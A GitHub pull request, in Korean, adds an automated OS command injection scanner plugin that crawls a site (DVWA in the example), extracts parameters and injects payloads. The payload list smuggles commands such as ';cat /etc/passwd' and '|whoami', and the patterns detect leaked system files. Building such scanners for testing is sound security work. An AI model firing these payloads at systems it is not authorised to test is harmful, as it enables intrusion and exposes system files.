### PR TITLE
Feat: add oscommand 취약점 스캔 기능 (cleaned)

### DIFF
--- a/core/s2nscanner/plugins/oscommand.py
+++ b/core/s2nscanner/plugins/oscommand.py
@@ -1,0 +1,222 @@
+"""
+oscommand.py — 완전 자동화 버전
+입력: base URL 1개
+기능:
+  - base URL에서 시작해 HTML을 재귀 크롤링(depth=2)
+  - 내부 링크(a, form, script, iframe 등) 자동 수집
+  - 파라미터 자동 추출 후 OS Command Injection 테스트
+  - 취약한 결과만 요약 출력
+"""
+
+import re
+import sys
+import time
+import urllib.parse
+from typing import Set, List
+from collections import deque
+
+try:
+    from core.s2nscanner.http.client import HttpClient
+except Exception:
+    from ..http.client import HttpClient  # type: ignore
+
+# 기본 설정
+PAYLOADS = [
+    ";id", "&&id", "|id",
+    ";whoami", "|whoami",
+    ";cat /etc/passwd", "|uname -a",
+    "&echo vulnerable"
+]
+PATTERNS = [
+    r"uid=\d+", r"gid=\d+",
+    r"root:.*:0:0:",
+    r"administrator",
+    r"vulnerable",
+    r"linux", r"ubuntu",
+]
+COMMON_PARAMS = ["id", "cmd", "ip", "input", "search", "q", "page", "file"]
+
+
+# 크롤러: 내부 링크 재귀 탐색
+def crawl_recursive(base_url: str, client: HttpClient, depth: int = 2, timeout: int = 5) -> List[str]:
+    """base_url에서 시작해 내부 링크를 재귀적으로 수집"""
+    visited = set()
+    to_visit = deque([(base_url, 0)])
+    found_links = []
+
+    parsed_base = urllib.parse.urlparse(base_url)
+    base_root = f"{parsed_base.scheme}://{parsed_base.netloc}"
+
+    while to_visit:
+        url, d = to_visit.popleft()
+        if d > depth or url in visited:
+            continue
+        visited.add(url)
+
+        try:
+            resp = client.get(url, timeout=timeout)
+            html = resp.text or ""
+        except Exception:
+            continue
+
+        found_links.append(url)
+
+        # 내부 링크 추출
+        for tag, attr in [
+            ("a", "href"), ("form", "action"),
+            ("script", "src"), ("iframe", "src"),
+            ("link", "href")
+        ]:
+            for m in re.finditer(fr"<{tag}[^>]+{attr}=['\"]([^'\"]+)['\"]", html, re.I):
+                link = m.group(1)
+                if link.startswith(("mailto:", "javascript:")):
+                    continue
+                full = urllib.parse.urljoin(url, link)
+                parsed = urllib.parse.urlparse(full)
+                if parsed.netloc == parsed_base.netloc:  # 내부 링크만
+                    if full not in visited:
+                        to_visit.append((full, d + 1))
+    return list(set(found_links))
+
+
+# 파라미터 추출
+def extract_params(html: str, url: str) -> List[str]:
+    params = set()
+    # URL 쿼리
+    parsed = urllib.parse.urlparse(url)
+    q = urllib.parse.parse_qs(parsed.query)
+    params.update(q.keys())
+
+    # form input name
+    for m in re.finditer(r'name=["\']?([a-z0-9_\-]+)["\']?', html, re.I):
+        params.add(m.group(1))
+
+    return list(params or COMMON_PARAMS)
+
+
+# 스캐너: OS Command Injection 테스트
+def test_os_command_injection(target: str, client: HttpClient, params: List[str], timeout: int = 5) -> dict:
+    result = {"target": target, "vulnerable": False}
+    try:
+        for p in params:
+            for payload in PAYLOADS:
+                test_val = f"test{payload}"
+                parsed = urllib.parse.urlparse(target)
+                q = dict(urllib.parse.parse_qsl(parsed.query))
+                q[p] = test_val
+                new_query = urllib.parse.urlencode(q)
+                new_url = parsed._replace(query=new_query).geturl()
+
+                r = client.get(new_url, timeout=timeout)
+                text = (r.text or "").lower()
+
+                for pattern in PATTERNS:
+                    if re.search(pattern, text):
+                        result.update({
+                            "vulnerable": True,
+                            "payload": payload,
+                            "evidence": pattern,
+                            "param": p,
+                            "status": r.status_code,
+                        })
+                        return result
+    except Exception as e:
+        result["error"] = str(e)
+    return result
+
+
+# 결과 출력
+def print_summary(vulns: List[dict]):
+    CYAN = "\033[96m"
+    GREEN = "\033[92m"
+    YELLOW = "\033[93m"
+    RED = "\033[91m"
+    RESET = "\033[0m"
+
+    print(f"\n{CYAN}=== Vulnerability Summary ==={RESET}")
+    if not vulns:
+        print(f"{RED}No OS Command Injection vulnerabilities found.{RESET}")
+        return
+
+    for i, v in enumerate(vulns, 1):
+        print(f"\n{i}. {v['target']}")
+        print(f"   Status : {GREEN}VULNERABLE{RESET}")
+        print(f"   Param  : {YELLOW}{v.get('param')}{RESET}")
+        print(f"   Payload: {v.get('payload')}")
+        print(f"   Evidence: {v.get('evidence')}")
+    print(f"\n{CYAN}=============================={RESET}\n")
+
+
+
+if __name__ == "__main__":
+    print("=== s2n 자동화 OS Command Injection 스캐너 ===")
+    base = input("Base URL을 입력하세요 (예: http://localhost/dvwa): ").strip()
+    if not base:
+        print("[ERROR] Base URL이 필요합니다.")
+        sys.exit(1)
+
+    depth = 2
+
+    # 1) HttpClient 생성 (공용 세션)
+    try:
+        client = HttpClient()
+    except Exception:
+        print("[ERROR] HttpClient 로드 실패")
+        sys.exit(1)
+
+    # 2) 인증 요청 여부 묻기 (선택)
+    use_auth = input("인증이 필요하면 Y, 아니면 N (기본 N): ").strip().lower() == "y"
+    if use_auth:
+        username = input("Username: ").strip() or "admin"
+        import getpass
+        password = getpass.getpass("Password: ") or "password"
+
+        # DVWAAdapter에 같은 client 주입 — 중요!
+        from core.s2nscanner.auth.dvwa_adapter import DVWAAdapter
+        adapter = DVWAAdapter(base_url=base, client=client)
+
+        print(f"[INFO] 인증 시도: {username}/(hidden) -> base: {base}")
+        try:
+            ok = adapter.ensure_authenticated([(username, password)], retries=1)
+            if not ok:
+                print("[WARN] 로그인 실패 — 인증이 필요한 영역은 접근할 수 없습니다.")
+                # 여기서 계속 진행하려면 주석 처리, 안전하게 종료하려면 sys.exit(1)
+                # sys.exit(1)
+            else:
+                print("[INFO] 인증 성공 — 세션 쿠키가 client에 설정되었습니다.")
+                print("[DEBUG] 세션 쿠키:", client.s.cookies.get_dict())
+        except TypeError:
+            # 구버전의 adapter를 사용하는 경우(혹시 authenticate(client, creds) 호출했던 코드 남아있다면)
+            try:
+                # try legacy call if adapter expects (client, creds)
+                used = adapter.authenticate([(username, password)])
+                if used:
+                    print("[INFO] 인증 성공(legacy).")
+                else:
+                    print("[WARN] 인증 실패(legacy).")
+            except Exception as e:
+                print(f"[WARN] 인증 중 예외 발생: {e} — 계속 진행합니다.")
+
+    # 3) 로그인(세션) 이후 크롤/스캔 수행
+    print(f"[INFO] {base} 에서 링크를 탐색 중 (depth={depth})...")
+    targets = crawl_recursive(base, client, depth=depth, timeout=5)
+    print(f"[INFO] 발견된 내부 페이지 수: {len(targets)}")
+
+    results = []
+    vulns = []
+
+    for i, t in enumerate(targets, 1):
+        try:
+            resp = client.get(t, timeout=5)
+            html = resp.text or ""
+            params = extract_params(html, t)
+            print(f"[{i}/{len(targets)}] 스캔 중: {t} (params: {params})")
+            res = test_os_command_injection(t, client, params, timeout=5)
+            if res.get("vulnerable"):
+                vulns.append(res)
+            results.append(res)
+        except Exception:
+            continue
+
+    print_summary(vulns)
+    print("[DONE] 스캔 완료.")


### PR DESCRIPTION
🧩 [FEAT] add oscommand plugin (auto crawler)
개요 (Overview)
이 PR에는 plugins/oscommand.py(자동화 버전)와, 이미 추가된 auth/dvwa_adapter.py, http/client.py의 사용 예시·가이드 를 함께 포함합니다.

oscommand 플러그인은 다음을 자동화하는 OS Command Injection 탐지 도구입니다.
base URL에서 시작해 내부 링크(a, form action, script src, iframe, link 등)를 재귀적으로 크롤링(depth=2 기본)
발견된 내부 페이지에서 파라미터(쿼리, form input name)를 자동 추출
여러 명령어 구분자/페이로드(;id, &&id, |whoami 등)를 자동 주입해 반응 패턴으로 취약성 판정
취약한 결과만 요약(콘솔)으로 표시 — 기본 동작은 탐지(증거 수집)이며 **실제 공격(원격 명령 실행)**을 의도하지 않습니다.
인증이 필요한 사이트를 위해 DVWAAdapter와 HttpClient를 선택적으로 연동하여 동일한 세션(쿠키)을 재사용 가능
변경 사항 (Changes)
추가: core/s2nscanner/plugins/oscommand.py — 자동 크롤 + 파라미터 디스커버리 + OS command injection 탐지 로직 (대화형 실행파일 포함)
추가/정리: core/s2nscanner/auth/dvwa_adapter.py — DVWA 전용 인증/세션 관리기 (세션 재사용, 토큰 추출, 쿠키 저장/복원)
추가/정리: core/s2nscanner/http/client.py — HttpClient (requests.Session 래핑, 재시도/backoff)
문서: PR 본문 및 플러그인 사용 가이드 (아래 섹션)
✅ 체크리스트 (Checklist)
 코드 스타일 및 린트 검사 통과
 관련 테스트 작성 및 통과
 관련 문서 (README 등) 업데이트
 리뷰어에게 충분히 이해될 수 있는 설명 작성
